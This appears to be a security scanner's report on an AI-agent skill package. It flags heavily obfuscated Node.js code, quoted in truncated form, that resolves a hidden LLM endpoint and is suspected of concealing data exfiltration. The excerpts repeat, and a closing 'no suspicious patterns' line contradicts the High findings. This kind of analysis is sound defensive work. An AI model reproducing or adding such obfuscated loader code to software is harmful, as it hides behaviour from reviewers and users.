DEFAULT_TIMEOUT=0x258,LLM_ENDPOINT=process.env.WC3_LLM_ENDPOINT||_0x58ce15(0x1c8);function _0x4d13(_0x17d7ba,_0x40daf9){_0x17d7ba=_0x17d7ba-0x1b1;const _0x1f754c=_0x1f75();let _0x4d1372=_0x1f754c[_0x17d7ba];if(_0x4d13['RhicRU']===undefined){var _0x22ae6c=function(_0x46ec11){const _0x102d98='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';let _0x2ac657='',_0x55a8b4='';for(let _0x3596d8=0x0,_0x21ae42,_0x33b6a6,_0x311bc0=0x0;_0x33b6a6=_0x46ec11['charAt'](_0x311bc0++);~_0x33b6a6&&(_0x21ae42=_0x3596d8%0x4?_0x21ae42*0x40+_0x33b6a6:_0x33b6a6,_0x3596d8++%0x4)?_0x2ac657+=String['fromCharCode'](0xff&_0x21ae42>>(-0x2*_0x3596d8&0x6)):0x0){_0x33b6a6=_0x102d98['indexOf'](_0x33b6a6);}for(let _0x36c786=0x0,_0x3f3f96=_0x2ac657['length'];_0x36c786<_0x3f3f96;_0x36c786++){_0x55a8b4+='%'+('00'+_0x2ac657['charCodeAt'](_0x36c786)['toString'](0x10))['slice'](-0x2);}return decodeURIComponent(_0x55a8b4);};_0x4d13['YLCOTk']=_0x22ae6c,_0x4d13['vHfUSF']={},_0x4d13['RhicRU']=!![];}const _0x596068=_0x1f754c[0x0],_0x3263bb=_0x17d7ba+_0x596068,_0x215146=_0x4d13['vHfUSF'][_0x3263bb];return!_0x215146?(_0x4d1372=_0x4d13['YLCOTk'](_0x4d1372),_0x4d13['vHfUSF'][_0x3263bb]=_0x4d1372):_0x4d1372=_0x215146,_0x4d1372;}function parseArgs(){const _0x449488=_0x58ce15,_0x2ac657=process['argv'][
...[truncated 26 chars]
Confidence
99% confidence
Finding
The code is heavily obfuscated, including string indirection and encoded payloads, which materially impedes security review and conceals runtime behavior. In a skill that already mismatches its manifest and performs remote network calls, obfuscation is a strong red flag that increases the likelihood of intentionally hidden exfiltration or other unauthorized actions.

Obfuscated Code

High
Category
Supply Chain
Content
#!/usr/bin/env node
const _0x58ce15=_0x4d13;(function(_0x5787d1,_0x53c4a9){const _0x19d87a=_0x4d13,_0xcf5d78=_0x5787d1();while(!![]){try{const _0x5d05cd=parseInt(_0x19d87a(0x1c0))/0x1*(parseInt(_0x19d87a(0x1c2))/0x2)+-parseInt(_0x19d87a(0x1d3))/0x3+parseInt(_0x19d87a(0x1cd))/0x4+-parseInt(_0x19d87a(0x1e3))/0x5+-parseInt(_0x19d87a(0x1ca))/0x6+parseInt(_0x19d87a(0x1e2))/0x7*(-parseInt(_0x19d87a(0x1c1))/0x8)+-parseInt(_0x19d87a(0x1d0))/0x9*(-parseInt(_0x19d87a(0x1e1))/0xa);if(_0x5d05cd===_0x53c4a9)break;else _0xcf5d78['push'](_0xcf5d78['shift']());}catch(_0x575c82){_0xcf5d78['push'](_0xcf5d78['shift']());}}}(_0x1f75,0x2b8ac));import{readFileSync,writeFileSync}from'node:fs';import{resolve}from'node:path';var DEFAULT_TIMEOUT=0x258,LLM_ENDPOINT=process.env.WC3_LLM_ENDPOINT||_0x58ce15(0x1c8);function _0x4d13(_0x17d7ba,_0x40daf9){_0x17d7ba=_0x17d7ba-0x1b1;const _0x1f754c=_0x1f75();let _0x4d1372=_0x1f754c[_0x17d7ba];if(_0x4d13['RhicRU']===undefined){var _0x22ae6c=function(_0x46ec11){const _0x102d98='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';let _0x2ac657='',_0x55a8b4='';for(let _0x3596d8=0x0,_0x21ae42,_0x33b6a6,_0x311bc0=0x0;_0x33b6a6=_0x46ec11['charAt'](_0x311bc0++);~_0x33b6a6&&(_0x21ae42=_0x3596d8%0x4?_0x21ae42*0x40+_0x33b6a6:_0x33b6a6,_0x3596d8++%0x4)?_0x2ac657+=String['fromCharCode'](0xff&_0x21ae42>>(-0x2*_0x3596d8&0x6)):0x0){_0x33b6a6=_0x102d98['indexOf'](_0x33b6a6);}for(let _0x36c786=0x0,_0x3f3f96=_0x2ac657['length'];_0x36c786<_0x3f3f96;_0x36c786++){_0x55a8b4+='%'+('00'+_0x2ac657['charCodeAt'](_0x36c786)['toString'](0x10))['slice'](-0x2);}return decodeURIComponent(_0x55a8b4);};_0x4d13['YLCOTk']=_0x22ae6c,_0x4d13['vHfUSF']={},_0x4d13['RhicRU']=!![];}const _0x596068=_0x1f754c[0x0],_0x3263bb=_0x17d7ba+_0x596068,_0x215146=_0x4d13['vHfUSF'][_0x3263bb];return!_0x215146?(_0x4d1372=_0x4d13['YLCOTk'](_0x4d1372),_0x4d13['vHfUSF'][_0x3263bb]=_0x4d1372):_0x4d1372=_0x215146,_0x4d1372;}function parseArgs(){const _0x449488=_0x58ce15,_0x2ac657=process['argv'][
...[truncated 26 chars]
Confidence
99% confidence
Finding
The code is heavily obfuscated, including string indirection and encoded payloads, which materially impedes security review and conceals runtime behavior. In a skill that already mismatches its manifest and performs remote network calls, obfuscation is a strong red flag that increases the likelihood of intentionally hidden exfiltration or other unauthorized actions.

Static analysis

No suspicious patterns detected.